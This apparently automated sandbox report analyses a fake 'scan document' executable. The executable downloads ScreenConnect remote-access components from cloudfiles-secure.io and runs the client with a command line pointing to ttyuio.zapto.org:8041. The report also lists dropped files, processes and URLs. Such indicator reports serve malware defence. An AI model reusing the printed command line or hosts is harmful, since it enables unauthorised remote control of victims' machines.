Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Scan_doc_09_16_24_1120.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xfcf058cc, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Scan_doc_09_16_2_fec9a84a79da4acbbacb686b6265423b65e5331_ff68c4ec_e8d99851-ea41-4aa5-8422-6c4925e08426\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER360C.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed Oct 2 04:22:50 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A81.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AFF.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B1D.tmp.csv
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BBA.tmp.txt
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
|
Certificate, Version=3
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
|
Certificate, Version=3
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
|
data
|
modified
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.en-US.resources
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.resources
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.en-US.resources
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.resources
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\app.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\fr4vgpeb.newcfg
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\user.config
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\CHT0VHXS.log
|
Unicode text, UTF-16, little-endian text, with very long lines (623), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VTYYR3JN.ED2\5RJOO8WG.EGV.application
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Windows\System32\user.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 69 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe
|
"C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe"
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe"
"?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session"
"1"
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe"
"?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session"
"1"
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
"RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User"
|
||
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
"RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k WerSvcGroup
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
|
There are 3 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe
|
178.215.236.119
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.config
|
178.215.236.119
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest
|
178.215.236.119
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.config
|
178.215.236.119
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config
|
178.215.236.119
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe
|
178.215.236.119
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe
|
178.215.236.119
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll
|
178.215.236.119
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dll
|
178.215.236.119
|
||
http://schemas.xmlsoap.org/ws/2004/09/policyn
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/09/policy1p
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application5
|
unknown
|
||
https://login.l
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationP
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/ResolveUser.srf
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WPj
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationest
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Cli
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application22DW.YBK&
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationV
|
unknown
|
||
http://cloudfiles-secure.io
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationZ
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationX
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config%
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationl
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_n329
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
|
unknown
|
||
https://account.live.com/InlineSignup.aspx?iww=1&id=80502
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://Passport.NET/tb_
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationdb01WXG7
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.configPj
|
unknown
|
||
https://account.live.com/msangcwam
|
unknown
|
||
http://www.w3.or
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll/uL
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://passport.net/tb
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applic
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClie
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_re=msil
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.ap
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
|
unknown
|
||
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1
|
unknown
|
||
http://www.w3.ora
|
unknown
|
||
https://login.microsoftonline.com/MSARST2.srf
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceQuery.srfU
|
unknown
|
||
http://Passport.NET/STS
|
unknown
|
||
http://www.xrml.org/schema/2001/11/xrml2coreS
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationPNT
|
unknown
|
||
http://www.w3.o
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee2
|
unknown
|
||
http://Passport.NET/tb
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
|
unknown
|
||
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
|
unknown
|
||
https://signup.live.com/signup.aspx
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80603
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/09/policy
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllPj
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_
|
unknown
|
||
http://www.xrml.org/schema/2001/11/xrml2core
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80605
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80604
|
unknown
|
||
